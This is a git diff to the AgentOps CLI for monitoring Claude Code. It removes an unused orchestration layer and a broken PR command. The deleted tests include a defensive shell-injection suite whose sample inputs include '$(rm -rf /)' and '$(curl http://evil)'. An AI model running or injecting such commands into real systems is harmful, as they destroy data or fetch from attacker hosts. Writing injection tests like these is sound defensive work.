diff --git a/CHANGELOG.md b/CHANGELOG.md index a99f400..e795ef5 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -54,6 +54,21 @@ security gaps; all critical/high findings shipped the same day: foreign-key constraint and 500'd; `deletePolicy` now cascades its `policy_results` in a transaction and reports the count in the audit log. +### Removed + +- **The unused orchestration layer.** Jobs, the dispatcher, the orchestrator, + and coordination locks (core), their `jobs`/`locks` tables (db), and the + `job`, `lock`, and `dispatch` CLI commands were dead weight: nothing in the + hook-driven product path ever created a job or acquired a lock, dispatch + could never match a hook-created session, and the lock-expiry SQL was + broken. The dashboard's Jobs/Locks/Coordination pages were removed long + ago for the same reason. Databases created before this change keep their + empty `jobs`/`locks` tables; they are inert. +- **`agentops pr`.** It could never create a PR (`gh pr create` rejects the + `--json` flag it passed, and the error was swallowed), so every invocation + printed "Failed to create PR". `agentops link` (read-only PR/issue + linking) is unaffected. + ### Added #### Phase A — trial-blocking foundations diff --git a/CLAUDE.md b/CLAUDE.md index a46ddf0..6c466e1 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -60,8 +60,8 @@ core ← db ← cli ``` - **@agentops/core** — Domain types, policy engine, scoring algorithm, and builder functions for all entities. No external dependencies. All types use `readonly` and branded ID types (RunId, JobId, SessionId, etc.) for type safety. -- **@agentops/db** — SQLite persistence via Drizzle ORM + better-sqlite3. Sixteen tables: `runs`, `policies`, `policy_results`, `run_metrics`, `jobs`, `sessions`, `events`, `locks`, `users`, `api_tokens`, `auth_sessions`, `device_codes`, `webhooks`, `webhook_deliveries`, `audit_log`, `user_budgets`. Complex fields stored as JSON columns. DB defaults to `~/.agentops/agentops.db` (override with `AGENTOPS_DB_PATH`). WAL mode with `foreign_keys = ON` — deletes of parent rows must cascade children first (see `deletePolicy`, `deleteOldRuns`). -- **@agentops/cli** — CLI entry point (`agentops`). Commands: `init`, `serve`, `setup`, `hook`, `login`, `doctor`, `user`, `admin`, `cleanup`, `run`, `policy`, `report`, `wrap`, `watch`, `link`, `pr`, `job`, `session`, `events`, `lock`, `dispatch`. Supports `--json` output and `--db-path` override. `init` bootstraps the DB (`--seed` for sample data, `--seed-policies` for the starter policy set, `--clean` to reset). `serve` starts the dashboard server (`--port` to override 3000). `setup` configures Claude Code hooks (`--global`, `--uninstall`, `--dry-run`). `hook` handles Claude Code hook events (session-start, pre-tool-use, post-tool-use, user-prompt-submit, stop, subagent-stop, session-end) — reads JSON from stdin, manages state under `~/.agentops/state/`, evaluates policies in real-time, can block risky tool calls (exit code 2), and reads cost/token usage from the Claude Code transcript (deduped by `message.id`; unknown models warn on stderr instead of pricing at $0). `login` runs the device-flow auth against a dashboard; `doctor` diagnoses a local install. Helper modules: `format.ts` (output formatting), `git.ts` (git integration), `github.ts` (GitHub API), `transcript.ts` (usage/cost from Claude Code transcripts), `pricing` lives in core. Note: `job`, `lock`, `dispatch`, `wrap`, and `watch` operate on orchestration machinery that Claude Code hooks never populate — treat them as experimental/vestigial. +- **@agentops/db** — SQLite persistence via Drizzle ORM + better-sqlite3. Fourteen tables: `runs`, `policies`, `policy_results`, `run_metrics`, `sessions`, `events`, `users`, `api_tokens`, `auth_sessions`, `device_codes`, `webhooks`, `webhook_deliveries`, `audit_log`, `user_budgets`. Complex fields stored as JSON columns. DB defaults to `~/.agentops/agentops.db` (override with `AGENTOPS_DB_PATH`). WAL mode with `foreign_keys = ON` — deletes of parent rows must cascade children first (see `deletePolicy`, `deleteOldRuns`). (Databases created before July 2026 may carry orphaned `jobs`/`locks` tables from the removed orchestration layer; they're inert.) +- **@agentops/cli** — CLI entry point (`agentops`). Commands: `init`, `serve`, `setup`, `hook`, `login`, `doctor`, `user`, `admin`, `cleanup`, `run`, `policy`, `report`, `wrap`, `watch`, `link`, `session`, `events`. Supports `--json` output and `--db-path` override. `init` bootstraps the DB (`--seed` for sample data, `--seed-policies` for the starter policy set, `--clean` to reset). `serve` starts the dashboard server (`--port` to override 3000). `setup` configures Claude Code hooks (`--global`, `--uninstall`, `--dry-run`). `hook` handles Claude Code hook events (session-start, pre-tool-use, post-tool-use, user-prompt-submit, stop, subagent-stop, session-end) — reads JSON from stdin, manages state under `~/.agentops/state/`, evaluates policies in real-time, can block risky tool calls (exit code 2), and reads cost/token usage from the Claude Code transcript (deduped by `message.id`; unknown models warn on stderr instead of pricing at $0). `login` runs the device-flow auth against a dashboard; `doctor` diagnoses a local install. Helper modules: `format.ts` (output formatting), `git.ts` (git integration), `github.ts` (GitHub API), `transcript.ts` (usage/cost from Claude Code transcripts), `pricing` lives in core. - **@agentops/sdk** — Lightweight HTTP client for agent runtimes to talk to the AgentOps server. Depends only on `@agentops/core` for types. Uses native `fetch`. Provides `AgentOpsClient` class (via `createClient()` factory) with methods: `createSession`, `startRun`, `reportAction`, `reportArtifact`, `reportMetrics`, `checkPolicy`, `heartbeat`, `completeRun`, `failRun`, `terminateSession`. Also exports `PolicyMiddleware` for pre-flight policy checks before actions. Throws typed `AgentOpsError` with status codes. - **@agentops/web** — Next.js 16 App Router dashboard with React 19, Tailwind CSS 4. API routes under `src/app/api/` organized by resource (runs, sessions, policies, events, analytics, admin, stats, sdk, auth, budgets, webhooks). Jobs, Locks, and Coordination pages were removed from the dashboard because hooks do not populate this data. Sidebar nav: Runs | Sessions | Events | Analytics | Usage | Policies | Settings. **Every API route is authenticated** (`src/lib/auth.ts`): bearer tokens or session cookies, `admin`/`member` roles, members are scoped to their own runs/sessions (`resolveViewScope`), non-owners get 404 (not 403) to avoid ID enumeration, mutations additionally pass `checkSameOrigin` CSRF checks — new routes must follow this pattern (regression tests live in `api/__tests__/auth-gaps.test.ts`). Inbound SDK routes under `/api/sdk/` use bearer auth + per-token rate limits. The Usage page (`/usage`) always shows the local hook-captured rollup (incl. Bedrock-vs-direct backend split and per-user attribution); when `ANTHROPIC_ADMIN_API_KEY` is set it additionally shows org-wide cost/tokens via `/api/admin/{status,cost,analytics}`, which normalize the Anthropic Admin API's reports (RFC 3339 `starting_at`, paginated, amounts are decimal-string cents) server-side. Server components access SQLite directly via a singleton lazy-loaded DB instance (`src/lib/db.ts`). Uses `serverExternalPackages: ["better-sqlite3"]` in next.config.ts. Path alias: `@/*` → `./src/*`. Dark theme by default. diff --git a/packages/cli/src/__tests__/commands-repo-normalization.test.ts b/packages/cli/src/__tests__/commands-repo-normalization.test.ts index 50b4fa5..cfcae82 100644 --- a/packages/cli/src/__tests__/commands-repo-normalization.test.ts +++ b/packages/cli/src/__tests__/commands-repo-normalization.test.ts @@ -3,9 +3,8 @@ import { mkdirSync, rmSync } from "node:fs"; import { tmpdir } from "node:os"; import { resolve } from "node:path"; import { Command } from "commander"; -import { getDb, listRuns, listJobs } from "@agentops/db"; +import { getDb, listRuns } from "@agentops/db"; import { registerRunCommands } from "../commands/run.js"; -import { registerJobCommands } from "../commands/job.js"; // Proves the CLI write paths that accept an explicit --repo option // (`run start`, `job submit`) canonicalize it on write, so an operator-typed @@ -38,7 +37,6 @@ async function runCli(args: string[], dbPath: string): Promise { .option("--db-path ", "DB path", dbPath) .option("--json"); registerRunCommands(program); - registerJobCommands(program); await program.parseAsync(["node", "agentops", ...args]); } finally { console.log = originalLog; @@ -58,21 +56,6 @@ describe("CLI --repo write-path normalization", () => { expect(runs[0]!.environment.repo).toBe("iaj6/agentops"); }); - it("`job submit --repo` canonicalizes a full remote URL", async () => { - const dir = makeTmpDir(); - const dbPath = resolve(dir, "test.db"); - const db = getDb(dbPath); - - await runCli( - ["job", "submit", "ship it", "--repo", "git@github.com:Iaj6/AgentOps.git"], - dbPath, - ); - - const jobs = listJobs(db, { limit: 10 }); - expect(jobs).toHaveLength(1); - expect(jobs[0]!.environment.repo).toBe("iaj6/agentops"); - }); - it("the default --repo ('unknown') round-trips unchanged", async () => { const dir = makeTmpDir(); const dbPath = resolve(dir, "test.db"); diff --git a/packages/cli/src/__tests__/github.test.ts b/packages/cli/src/__tests__/github.test.ts index d1a03a6..950cc85 100644 --- a/packages/cli/src/__tests__/github.test.ts +++ b/packages/cli/src/__tests__/github.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, vi, beforeEach } from "vitest"; -import { getLinkedPR, getIssue, createPR, addPRComment, createCheckRun, isGhAvailable } from "../github.js"; +import { getLinkedPR, getIssue, isGhAvailable } from "../github.js"; vi.mock("node:child_process", () => ({ execFileSync: vi.fn(), @@ -253,177 +253,3 @@ describe("getIssue", () => { }); }); -describe("createPR", () => { - it("returns null when gh is not available", () => { - mockGhUnavailable(); - expect(createPR("title", "body")).toBeNull(); - }); - - it("creates a PR and returns parsed data", () => { - const prData = { - number: 55, - title: "New feature", - url: "https://github.com/acme/app/pull/55", - state: "OPEN", - headRefName: "feat/new", - baseRefName: "main", - additions: 50, - deletions: 10, - changedFiles: 3, - }; - - mockExecSync.mockImplementation((file: string, args?: readonly string[]) => { - const cmdStr = [file, ...(args ?? [])].join(" "); - if (cmdStr === "gh --version") return "gh version 2.40.0\n" as any; - if (cmdStr.startsWith("gh pr create")) return JSON.stringify(prData) as any; - return "" as any; - }); - - const pr = createPR("New feature", "Description of the feature", "main"); - expect(pr).not.toBeNull(); - expect(pr!.number).toBe(55); - expect(pr!.title).toBe("New feature"); - }); - - it("returns null when gh pr create fails", () => { - mockExecSync.mockImplementation((file: string, args?: readonly string[]) => { - const cmdStr = [file, ...(args ?? [])].join(" "); - if (cmdStr === "gh --version") return "gh version 2.40.0\n" as any; - // All gh commands return empty (failure) - return "" as any; - }); - - expect(createPR("title", "body")).toBeNull(); - }); -}); - -describe("addPRComment", () => { - it("returns false when gh is not available", () => { - mockGhUnavailable(); - expect(addPRComment(42, "comment")).toBe(false); - }); - - it("returns true on success", () => { - mockExecSync.mockImplementation((file: string, args?: readonly string[]) => { - const cmdStr = [file, ...(args ?? [])].join(" "); - if (cmdStr === "gh --version") return "gh version 2.40.0\n" as any; - if (cmdStr.startsWith("gh pr comment")) return "https://github.com/acme/app/pull/42#comment" as any; - return "" as any; - }); - - expect(addPRComment(42, "Looks good!")).toBe(true); - }); - - it("returns false when comment fails", () => { - mockExecSync.mockImplementation((file: string, args?: readonly string[]) => { - const cmdStr = [file, ...(args ?? [])].join(" "); - if (cmdStr === "gh --version") return "gh version 2.40.0\n" as any; - return "" as any; - }); - - expect(addPRComment(42, "comment")).toBe(false); - }); -}); - -describe("createCheckRun", () => { - it("returns null when gh is not available", () => { - mockGhUnavailable(); - expect(createCheckRun("test", "completed", "success")).toBeNull(); - }); - - it("returns check object with provided values", () => { - mockExecSync.mockImplementation((file: string, args?: readonly string[]) => { - const cmdStr = [file, ...(args ?? [])].join(" "); - if (cmdStr === "gh --version") return "gh version 2.40.0\n" as any; - if (cmdStr.startsWith("git rev-parse")) return "abc123def\n" as any; - if (cmdStr.startsWith("gh api")) return "{}" as any; - return "" as any; - }); - - const check = createCheckRun("CI Check", "completed", "success", "https://ci.example.com/run/1"); - expect(check).not.toBeNull(); - expect(check!.name).toBe("CI Check"); - expect(check!.status).toBe("completed"); - expect(check!.conclusion).toBe("success"); - expect(check!.url).toBe("https://ci.example.com/run/1"); - }); - - it("returns null when HEAD sha cannot be resolved", () => { - mockExecSync.mockImplementation((file: string, args?: readonly string[]) => { - const cmdStr = [file, ...(args ?? [])].join(" "); - if (cmdStr === "gh --version") return "gh version 2.40.0\n" as any; - if (cmdStr.startsWith("git rev-parse")) throw new Error("not a git repo"); - return "" as any; - }); - - expect(createCheckRun("test", "completed", "success")).toBeNull(); - }); -}); - -// Injection-fix guard: untrusted text (PR/comment bodies, check-run payloads) -// must travel via stdin (the execFileSync `input` option), never embedded in -// argv — and there must be no shell. These assertions FAIL against vulnerable -// inline-argv code like gh(['pr','create','--title',t,'--body',body]). -describe("argument safety (no shell injection surface)", () => { - // Each recorded call is [file, argsArray, options]; pull out file/args/input. - function calls() { - return mockExecSync.mock.calls.map((c) => ({ - file: c[0] as string, - args: (c[1] as string[]) ?? [], - input: (c[2] as { input?: string } | undefined)?.input, - })); - } - - it("createPR pipes the body via stdin, never argv", () => { - mockGhAvailable(); - const body = "evil $(rm -rf /) `whoami`\nsecond line"; - const title = "title with `backticks` and $(subshell)"; - createPR(title, body, "main"); - - const call = calls().find((c) => c.args[0] === "pr" && c.args[1] === "create"); - expect(call).toBeDefined(); - expect(call!.args).toContain("--body-file"); - expect(call!.args).toContain("-"); - expect(call!.args).not.toContain(body); // body is NOT in argv - expect(call!.input).toBe(body); // body arrives via stdin - // Title is passed as a single argv element — no shell, so metacharacters - // are literal, not interpreted. - expect(call!.args).toContain(title); - }); - - it("addPRComment pipes the comment body via stdin, never argv", () => { - mockGhAvailable(); - const body = "$(curl http://evil) `id` payload"; - addPRComment(42, body); - - const call = calls().find((c) => c.args[0] === "pr" && c.args[1] === "comment"); - expect(call).toBeDefined(); - expect(call!.args).toContain("--body-file"); - expect(call!.args).toContain("-"); - expect(call!.args).not.toContain(body); - expect(call!.input).toBe(body); - }); - - it("createCheckRun sends a JSON payload via stdin (--input -), never argv", () => { - mockExecSync.mockImplementation((file: string, args?: readonly string[]) => { - const cmdStr = [file, ...(args ?? [])].join(" "); - if (cmdStr === "gh --version") return "gh version 2.40.0\n" as any; - if (cmdStr.startsWith("git rev-parse")) return "abc123def\n" as any; - return "" as any; - }); - createCheckRun("name `id`", "completed", "failure", "https://x/$(id)"); - - const call = calls().find((c) => c.args[0] === "api"); - expect(call).toBeDefined(); - expect(call!.args).toContain("--input"); - expect(call!.args).toContain("-"); - // Raw metacharacters never reach argv... - expect(call!.args.join(" ")).not.toContain("$(id)"); - // ...they're carried as a well-formed JSON document over stdin. - const payload = JSON.parse(call!.input as string) as Record; - expect(payload.name).toBe("name `id`"); - expect(payload.head_sha).toBe("abc123def"); - expect(payload.conclusion).toBe("failure"); - expect(payload.details_url).toBe("https://x/$(id)"); - }); -}); diff --git a/packages/cli/src/__tests__/pr.test.ts b/packages/cli/src/__tests__/pr.test.ts deleted file mode 100644 index 12fad30..0000000 --- a/packages/cli/src/__tests__/pr.test.ts +++ /dev/null @@ -1,64 +0,0 @@ -import { describe, it, expect } from "vitest"; -import { Command } from "commander"; -import { registerPRCommand } from "../commands/pr.js"; - -describe("PR command registration", () => { - it("registers pr command without errors", () => { - const program = new Command(); - program.option("--db-path ").option("--json"); - - expect(() => registerPRCommand(program)).not.toThrow(); - - const prCmd = program.commands.find((c) => c.name() === "pr"); - expect(prCmd).toBeDefined(); - }); - - it("pr command accepts runId argument", () => { - const program = new Command(); - program.option("--db-path ").option("--json"); - registerPRCommand(program); - - const prCmd = program.commands.find((c) => c.name() === "pr"); - const args = prCmd!.registeredArguments; - expect(args).toHaveLength(1); - expect(args[0]!.name()).toBe("runId"); - }); - - it("pr command has --base option defaulting to main", () => { - const program = new Command(); - program.option("--db-path ").option("--json"); - registerPRCommand(program); - - const prCmd = program.commands.find((c) => c.name() === "pr"); - const baseOpt = prCmd!.options.find((o) => o.long === "--base"); - expect(baseOpt).toBeDefined(); - expect(baseOpt!.defaultValue).toBe("main"); - }); - - it("can register alongside link and other commands", () => { - const program = new Command(); - program - .name("agentops") - .option("--db-path ") - .option("--json"); - - program.command("run").description("Manage runs"); - program.command("link").description("Link GitHub resources"); - - expect(() => registerPRCommand(program)).not.toThrow(); - - const commandNames = program.commands.map((c) => c.name()); - expect(commandNames).toContain("run"); - expect(commandNames).toContain("link"); - expect(commandNames).toContain("pr"); - }); - - it("pr command has correct description", () => { - const program = new Command(); - program.option("--db-path ").option("--json"); - registerPRCommand(program); - - const prCmd = program.commands.find((c) => c.name() === "pr"); - expect(prCmd!.description()).toContain("PR"); - }); -}); diff --git a/packages/cli/src/commands/dispatch.ts b/packages/cli/src/commands/dispatch.ts deleted file mode 100644 index 417c2b3..0000000 --- a/packages/cli/src/commands/dispatch.ts +++ /dev/null @@ -1,110 +0,0 @@ -import { Command } from "commander"; -import { EventBus } from "@agentops/core"; -import type { OrchestratorDb } from "@agentops/core"; -import { - dispatchNextJob, - cleanupStaleSessions, - cleanupExpiredLocks, -} from "@agentops/core"; -import { - getDb, - getJob, - getQueuedJobs, - countJobsByRepo, - countJobsActive, - getSession, - getActiveSessions, - getStaleSessions, - updateJob, - updateSession, - insertEvent, - insertLock, - updateLock, - getActiveLocks, - getActiveLocksForHolder, - releaseLocksForHolder, - releaseExpiredLocks, -} from "@agentops/db"; -import type { AgentOpsDb } from "@agentops/db"; - -function wrapDb(db: AgentOpsDb): OrchestratorDb { - return { - insertJob: (job) => { - // Not needed for dispatch/cleanup commands - throw new Error("insertJob not expected in dispatch commands"); - }, - getJob: (id) => getJob(db, id), - updateJob: (id, updates) => updateJob(db, id, updates), - getQueuedJobs: (limit) => getQueuedJobs(db, limit), - countJobsByRepo: (repo, statuses) => countJobsByRepo(db, repo, statuses), - countJobsActive: () => countJobsActive(db), - getSession: (id) => getSession(db, id), - updateSession: (id, updates) => updateSession(db, id, updates), - getActiveSessions: () => getActiveSessions(db), - getStaleSessions: (thresholdIso) => getStaleSessions(db, thresholdIso), - insertEvent: (event) => insertEvent(db, event), - insertLock: (lock) => insertLock(db, lock), - updateLock: (id, updates) => updateLock(db, id, updates), - getActiveLocks: (resource) => getActiveLocks(db, resource), - getActiveLocksForHolder: (holderId) => getActiveLocksForHolder(db, holderId), - releaseLocksForHolder: (holderId) => releaseLocksForHolder(db, holderId), - releaseExpiredLocks: () => releaseExpiredLocks(db), - }; -} - -export function registerDispatchCommands(program: Command): void { - const dispatch = program.command("dispatch").description("Dispatch and cleanup orchestration"); - - dispatch - .command("next") - .description("Dispatch the next queued job to an available session") - .action(() => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - const odb = wrapDb(db); - const eventBus = new EventBus(); - - const result = dispatchNextJob(odb, eventBus); - - if (json) { - console.log(JSON.stringify(result, null, 2)); - return; - } - - if (result.dispatched) { - console.log(`Dispatched job ${result.job!.id} to session ${result.session!.id}`); - } else { - console.log(`No dispatch: ${result.reason}`); - } - }); - - dispatch - .command("cleanup") - .description("Clean up stale sessions and expired locks") - .option("--threshold ", "Heartbeat staleness threshold in ms", "60000") - .action((opts: { threshold: string }) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - const odb = wrapDb(db); - const eventBus = new EventBus(); - - const thresholdMs = parseInt(opts.threshold, 10); - const terminatedSessions = cleanupStaleSessions(odb, thresholdMs, eventBus); - const releasedLocks = cleanupExpiredLocks(odb, eventBus); - - if (json) { - console.log( - JSON.stringify({ - terminatedSessions: terminatedSessions.length, - releasedLocks, - }), - ); - return; - } - - console.log(`Terminated ${terminatedSessions.length} stale session(s).`); - console.log(`Released ${releasedLocks} expired lock(s).`); - }); -} diff --git a/packages/cli/src/commands/events.ts b/packages/cli/src/commands/events.ts index 29c4b6c..4675ea6 100644 --- a/packages/cli/src/commands/events.ts +++ b/packages/cli/src/commands/events.ts @@ -21,8 +21,6 @@ const magenta = (s: string) => `\x1b[35m${s}\x1b[0m`; function colorCategory(category: string): string { switch (category) { - case EventCategory.Job: - return cyan(category); case EventCategory.Run: return green(category); case EventCategory.Session: diff --git a/packages/cli/src/commands/job.ts b/packages/cli/src/commands/job.ts deleted file mode 100644 index 5b42dd3..0000000 --- a/packages/cli/src/commands/job.ts +++ /dev/null @@ -1,228 +0,0 @@ -import { Command } from "commander"; -import { - JobStatus, - JobPriority, - createJobId, - createJob, - cancelJob, - retryJob, - normalizeRepo, -} from "@agentops/core"; -import type { Job } from "@agentops/core"; -import { getDb, insertJob, getJob, listJobs, updateJob, getQueuedJobs } from "@agentops/db"; -import { table, colorStatus } from "../format.js"; - -export function registerJobCommands(program: Command): void { - const job = program.command("job").description("Manage agent jobs"); - - job - .command("submit") - .description("Submit a new job to the queue") - .argument("", "The goal for this job") - .option("--repo ", "Repository name", "unknown") - .option("--branch ", "Branch name", "main") - .option("--priority ", "Job priority (critical, high, normal, low)", "normal") - .action((goal: string, opts: { repo: string; branch: string; priority: string }) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - - const priority = (Object.values(JobPriority).includes(opts.priority as JobPriority) - ? opts.priority - : JobPriority.Normal) as JobPriority; - - const newJob = createJob( - { - humanReadable: goal, - structured: { type: "task", description: goal, parameters: {} }, - }, - { - // Canonicalize so an explicit --repo buckets the same as - // wrap/hook/SDK-produced runs. - repo: normalizeRepo(opts.repo), - branch: opts.branch, - permissions: [], - sandbox: { enabled: false, isolationLevel: "none" }, - }, - { priority }, - ); - insertJob(db, newJob); - - if (json) { - console.log(JSON.stringify({ id: newJob.id, status: newJob.status, priority: newJob.priority })); - } else { - console.log(`Job submitted: ${newJob.id} (priority: ${newJob.priority})`); - } - }); - - job - .command("status") - .description("Show job status and details") - .argument("", "The job ID") - .action((jobId: string) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - const j = getJob(db, createJobId(jobId)); - - if (!j) { - console.error(`Job not found: ${jobId}`); - process.exit(1); - } - - if (json) { - console.log(JSON.stringify(j, null, 2)); - return; - } - - console.log(`Job: ${j.id}`); - console.log(`Status: ${colorStatus(j.status)}`); - console.log(`Priority: ${j.priority}`); - console.log(`Goal: ${j.goal.humanReadable}`); - console.log(`Repo: ${j.environment.repo}`); - console.log(`Branch: ${j.environment.branch}`); - console.log(`Attempt: ${j.attempt}/${j.maxAttempts}`); - console.log(`Session: ${j.sessionId ?? "none"}`); - console.log(`Runs: ${j.runIds.length > 0 ? (j.runIds as unknown as string[]).join(", ") : "none"}`); - console.log(`Queued: ${j.queuedAt}`); - if (j.dispatchedAt) console.log(`Dispatched: ${j.dispatchedAt}`); - if (j.completedAt) console.log(`Completed: ${j.completedAt}`); - console.log(`Created: ${j.createdAt}`); - console.log(`Updated: ${j.updatedAt}`); - }); - - job - .command("list") - .description("List recent jobs") - .option("--status ", "Filter by status") - .option("--repo ", "Filter by repo") - .option("--limit ", "Max results", "20") - .action((opts: { status?: string; repo?: string; limit: string }) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - - const results = listJobs(db, { - status: opts.status, - // Normalize the filter to match the canonical form stored on write - // (skip when absent so we don't turn "no filter" into an empty match). - repo: opts.repo ? normalizeRepo(opts.repo) : opts.repo, - limit: parseInt(opts.limit, 10), - }); - - if (json) { - console.log(JSON.stringify(results, null, 2)); - return; - } - - if (results.length === 0) { - console.log("No jobs found."); - return; - } - - const rows = results.map((j) => [ - j.id as string, - colorStatus(j.status), - j.priority, - j.environment.repo, - j.queuedAt, - ]); - - console.log(table(["ID", "Status", "Priority", "Repo", "Queued"], rows)); - }); - - job - .command("cancel") - .description("Cancel a job") - .argument("", "The job ID") - .action((jobId: string) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - const j = getJob(db, createJobId(jobId)); - - if (!j) { - console.error(`Job not found: ${jobId}`); - process.exit(1); - } - - const cancelled = cancelJob(j); - updateJob(db, cancelled.id, { - status: cancelled.status, - updatedAt: cancelled.updatedAt, - }); - - if (json) { - console.log(JSON.stringify({ id: cancelled.id, status: cancelled.status })); - } else { - console.log(`Job ${jobId} cancelled.`); - } - }); - - job - .command("retry") - .description("Retry a failed job") - .argument("", "The job ID") - .action((jobId: string) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - const j = getJob(db, createJobId(jobId)); - - if (!j) { - console.error(`Job not found: ${jobId}`); - process.exit(1); - } - - const retried = retryJob(j); - updateJob(db, retried.id, { - status: retried.status, - attempt: retried.attempt, - sessionId: retried.sessionId, - dispatchedAt: retried.dispatchedAt, - updatedAt: retried.updatedAt, - }); - - if (json) { - console.log(JSON.stringify({ id: retried.id, status: retried.status, attempt: retried.attempt })); - } else { - if (retried.status === JobStatus.Failed) { - console.log(`Job ${jobId} has exceeded max attempts (${retried.maxAttempts}).`); - } else { - console.log(`Job ${jobId} retried (attempt ${retried.attempt}/${retried.maxAttempts}).`); - } - } - }); - - job - .command("queue") - .description("Show current job queue") - .option("--limit ", "Max results", "20") - .action((opts: { limit: string }) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - - const queued = getQueuedJobs(db, parseInt(opts.limit, 10)); - - if (json) { - console.log(JSON.stringify(queued, null, 2)); - return; - } - - if (queued.length === 0) { - console.log("Queue is empty."); - return; - } - - const rows = queued.map((j) => [ - j.id as string, - j.priority, - j.environment.repo, - `${j.attempt}/${j.maxAttempts}`, - j.queuedAt, - ]); - - console.log(table(["ID", "Priority", "Repo", "Attempt", "Queued"], rows)); - }); -} diff --git a/packages/cli/src/commands/lock.ts b/packages/cli/src/commands/lock.ts deleted file mode 100644 index 9b1509a..0000000 --- a/packages/cli/src/commands/lock.ts +++ /dev/null @@ -1,174 +0,0 @@ -import { Command } from "commander"; -import { - LockType, - createLockId, - createLock, - releaseLock, - checkConflicts, -} from "@agentops/core"; -import { - getDb, - insertLock, - getLock, - listLocks, - updateLock, - getActiveLocks, - releaseExpiredLocks, -} from "@agentops/db"; -import { table, colorStatus } from "../format.js"; - -export function registerLockCommands(program: Command): void { - const lock = program.command("lock").description("Manage resource locks"); - - lock - .command("list") - .description("List resource locks") - .option("--resource ", "Filter by resource") - .option("--active", "Only show active locks") - .option("--limit ", "Max results", "20") - .action((opts: { resource?: string; active?: boolean; limit: string }) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - - const results = listLocks(db, { - resource: opts.resource, - active: opts.active, - limit: parseInt(opts.limit, 10), - }); - - if (json) { - console.log(JSON.stringify(results, null, 2)); - return; - } - - if (results.length === 0) { - console.log("No locks found."); - return; - } - - const rows = results.map((l) => [ - l.id as string, - l.lockType, - l.resource, - l.holderId, - l.released ? "released" : new Date(l.expiresAt) < new Date() ? "expired" : "active", - l.acquiredAt, - ]); - - console.log(table(["ID", "Type", "Resource", "Holder", "Status", "Acquired"], rows)); - }); - - lock - .command("acquire") - .description("Acquire a resource lock") - .argument("", "The resource to lock") - .option("--type ", "Lock type (repo, path, branch)", "repo") - .option("--holder ", "Lock holder ID", "cli-user") - .option("--duration ", "Lock duration in milliseconds", "300000") - .action((resource: string, opts: { type: string; holder: string; duration: string }) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - - const lockType = opts.type as LockType; - if (!Object.values(LockType).includes(lockType)) { - console.error(`Invalid lock type: ${opts.type}. Must be one of: ${Object.values(LockType).join(", ")}`); - process.exit(1); - } - - // Check for conflicts - const active = getActiveLocks(db, resource); - const conflicts = checkConflicts(resource, lockType, active); - - if (conflicts.hasConflict) { - console.error(`Cannot acquire lock: ${conflicts.message}`); - process.exit(1); - } - - const newLock = createLock(lockType, resource, opts.holder, parseInt(opts.duration, 10)); - insertLock(db, newLock); - - if (json) { - console.log(JSON.stringify({ id: newLock.id, resource: newLock.resource, expiresAt: newLock.expiresAt })); - } else { - console.log(`Lock acquired: ${newLock.id}`); - console.log(` Resource: ${newLock.resource}`); - console.log(` Expires: ${newLock.expiresAt}`); - } - }); - - lock - .command("release") - .description("Release a lock") - .argument("", "The lock ID to release") - .action((lockId: string) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - - const existing = getLock(db, createLockId(lockId)); - if (!existing) { - console.error(`Lock not found: ${lockId}`); - process.exit(1); - } - - if (existing.released) { - console.error(`Lock already released: ${lockId}`); - process.exit(1); - } - - const released = releaseLock(existing); - updateLock(db, released.id, { released: released.released }); - - if (json) { - console.log(JSON.stringify({ id: released.id, released: true })); - } else { - console.log(`Lock ${lockId} released.`); - } - }); - - lock - .command("check") - .description("Check who holds a lock on a resource") - .argument("", "The resource to check") - .action((resource: string) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - - const active = getActiveLocks(db, resource); - - if (json) { - console.log(JSON.stringify(active, null, 2)); - return; - } - - if (active.length === 0) { - console.log(`No active locks on: ${resource}`); - return; - } - - console.log(`Active locks on ${resource}:`); - for (const l of active) { - console.log(` ${l.id} — held by ${l.holderId} (${l.lockType}), expires ${l.expiresAt}`); - } - }); - - lock - .command("cleanup") - .description("Release all expired locks") - .action(() => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); - - const count = releaseExpiredLocks(db); - - if (json) { - console.log(JSON.stringify({ released: count })); - } else { - console.log(`Released ${count} expired lock(s).`); - } - }); -} diff --git a/packages/cli/src/commands/pr.ts b/packages/cli/src/commands/pr.ts deleted file mode 100644 index 298b611..0000000 --- a/packages/cli/src/commands/pr.ts +++ /dev/null @@ -1,175 +0,0 @@ -import { Command } from "commander"; -import { createRunId, computeScore, MergeRecommendation } from "@agentops/core"; -import type { Run, ScoreCard } from "@agentops/core"; -import { getDb, getRun, updateRun, listPolicies } from "@agentops/db"; -import { createPR, addPRComment, isGhAvailable } from "../github.js"; - -export function registerPRCommand(program: Command): void { - program - .command("pr") - .description("Create a GitHub PR from a completed run") - .argument("", "The run ID") - .option("--base ", "Base branch for the PR", "main") - .action((runId: string, opts: { base: string }) => { - const dbPath = program.opts()["dbPath"] as string | undefined; - const json = program.opts()["json"] as boolean | undefined; - const db = getDb(dbPath); 